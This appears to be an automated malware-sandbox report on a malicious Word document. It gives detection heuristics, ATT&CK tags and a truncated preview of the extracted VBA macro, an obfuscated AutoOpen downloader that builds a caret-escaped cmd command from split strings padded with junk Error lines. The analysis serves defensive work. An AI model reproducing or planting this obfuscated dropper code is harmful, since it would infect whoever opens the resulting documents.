MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro uses a Shell() call and builds a command string that appears intended to download and execute a secondary payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665579-0' further supports its role as a downloader.
Heuristics (7)

| Finding | Severity | Tag | Description |
|---|---|---|---|
| ClamAV: Doc.Downloader.Valyria-6665579-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.Valyria-6665579-0 |
| VBA macros detected | medium (3 related findings) | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10426 bytes |

SHA-256: cb9dc38e2e2210b4dbcd45e1aeb6ed0cb13d626ab2cf746cd4a952a7b985584f
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "zUQMzSM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jzmcwrCrEjpMa"
Function RBffoAm()
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
Error ilakS * zHHlYS
sqHOSXm = "md" + " /v: " + "/c" + Chr(0 + 4 + 5 + 4 + 21) + "sET" + " ^ " + "^" + " n^" + "E^wc=" + "==A^Ag" + "^A^A" + "I^AACAg" + "^A^A"
Error DKCwY / DhoMD / OEtKDi / BJOWzX
MdsKdTjifG = "IA^" + "ACAg" + "A^AIA" + "^ACAg^A" + "^A" + "IAAC^A^" + "gAA^I^A" + "ACA" + "^gA^AIA" + "0" + "H^A"
Error 28475 * jDNbUj
Error YXWKNZ * Altcu * FwQALq / odKPD
Error OzMqMp / 43917 / uJUiV * ajiLP
Error 85303 / UaVYnK / 55862 * UiXFc
Error 68880 * poFYRj
Error 47342 / tscVpR * 67612 * iNwiDl
rHLtFSjm = "9Bw^eA" + "g^G^A^j" + "^B^A^" + "d^A^" + "E^G" + "^A^j^B" + "Qf^As" + "D^Ar^B"
Error HHPfv * ZDPFF
Error OWulv * 88854
SBGzTj = "QY^A^" + "U^GA^y^" + "BgYA" + "^" + "s^D^A^M" + "^BQ" + "^W^AQG" + "^AkA^A" + "I^A0^G" + "Al"
Error 14178 * jVsOtj
YFYmVKhGRFM = "BAdA^k^" + "E" + "AtA^Q^" + "ZA^sGA" + "v^Bg" + "d^A4" + "G^"
Error EhCMPq * WKbvK / 92414 / WGqNP
Error 94383 * pipwb
PGGdhT = "A" + "^J^Bw^" + "O" + "A" + "kC^AM^" + "BQ^WAQ^" + "G^A^" + "k^A^A^I" + "^AwC^AN" + "B" + "^w^dAE" + "E^AkAA" + "^K^A"
Error iEIcBJ * cziLr
Error 5899 / zszkJ
Error jCTSF / 11456 * jHnKc / UFTRf
bjrcMjKwt = "^U" + "^G^AsB^" + "Q" + "a^AYE^" + "AkB"
Error 92356 / aoTbtq * vnsjY / SfzTFa
Error jwwbp * zMrtO * 68975 / XSHlA
Error kAchu / acmbR * jZGCf / WKrvji
Error 90100 / 35150
Error 38963 * ATPCB
mjYXv = "^QY^A" + "8^G^A^" + "sB^g" + "^bAcHA" + "v^B^A" + "R^A" + "4" + "C" + "A" + "1^B^AWA" + "k"
Error Mnvnws * JfhPFp
Error 48987 / obaPrP
Error 64034 * XBwnZ
Error 46067 * 75224 / 68473 * UzCZU
Error mlsTz * iioMdW
Error 25570 * zYoGvi * oUutb * ifKlJI
bpOnmqq = "E^AkA" + "w" + "e^A" + "k" + "HAy" + "B^" + "A^dAsH^" + "A^pA" + "gd^AY^" + "H^AyB^A" + "^JAAC^A"
Error QOiSXk * MCzGU / OvbQf * SmFqiW
Error OXUdk / FGICKt / 20999 * zofBu
Error 46977 * 44445
Error FNHEI / PpAPdK
QwSawGdiU = "^uB^Qa^" + "A" + "^ACAN^B" + "^w" + "dA^E^EA" + "^" + "k^"
Error 52987 / 23631 / 70674 / 67701
Error WcEIQ / AVZIG
Error jzZdNW / XvHtu * 66134 / 71888
Error 95292 * UHLYz
TKPKdX = "A" + "A^K^Ag^" + "GAj^BQ^" + "YA^UG^A" + "yBw" + "^b^A^Y^" + "GA7Aw^" + "JAU^G"
Error 25317 / RqNOL * 80349 * imVXw
Error aJPVNo / YjCoa
hckDmREpWt = "^A" + "^" + "4^B^Q" + "Z^A^4CA" + "n^A^w" + "^KA^wE" + "A^J^" + "B^wUA^Q" + "C^A" + "r"
Error 9074 / zqFhj / MXtJzv * UqwnI
WTkMmS = "A^w^" + "JAwFAn" + "^A" + "^w^K^A^" + "MGA^p^B" + "^A^b" + "^" + "A^I^" + "GA^1^" + "BAcA^o" + "DA^" + "2^B^g^" + "b^A"
RBffoAm = sqHOSXm + MdsKdTjifG + rHLtFSjm + SBGzTj + YFYmVKhGRFM + PGGdhT + bjrcMjKwt + mjYXv + bpOnmqq + QwSawGdiU + TKPKdX + hckDmREpWt + WTkMmS
Error 3449 * MbSiaL
Error mXDVEO * BLhDH * TQiHnH * WoBbTI
Error 85187 / VASfdA * qCVclp / Jjimiq
End Function
Function MRDNTVEYbNS()
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
Error 26946 / NFRZkS
Error 13064 / 50736
ThWKoZszc = "^UG^" + "A" + "k^AQP^A" + "^" + "w" + "E" + "^A^ZB" + "A^Z^A" + "QCA" + "7^A" + "^wJ^A" + "^" + "MDAyAQ"
Error rpRYA / dCtth * 80804 * lVsKY
Error ssuNPI * iFONmc
Error 24701 * 86507 * wcapB * sJLJIZ
Error 89432 / 30238 / KnXnER * wVbCv
owZQl = "MAcCAgA" + "^QP^A^A" + "C^" + "A^" + "M^BQ" + "^S"
Error fzkdUX / bOOOs * 66747 * LSZkD
Error NczKwh / iujcAw
Error 55869 / wHTro * LAmKjh / histA
PYXkRNfN = "AMF^A" + "kA" + "wO^" + "A^" + "kCAnAAQ" + "A" + "cCA^oAA"
Error XpjtU / lrkkNv
Error mIzcE / TzRKW * 53795 * jdBFdi
Error 43110 / XRljlX * rwQWMS / wWwRU
zTmzDpc = "d^A" + "kG^A^sB" + "Ac^AM^F" + "^A^" + "uA^w ... (truncated)
```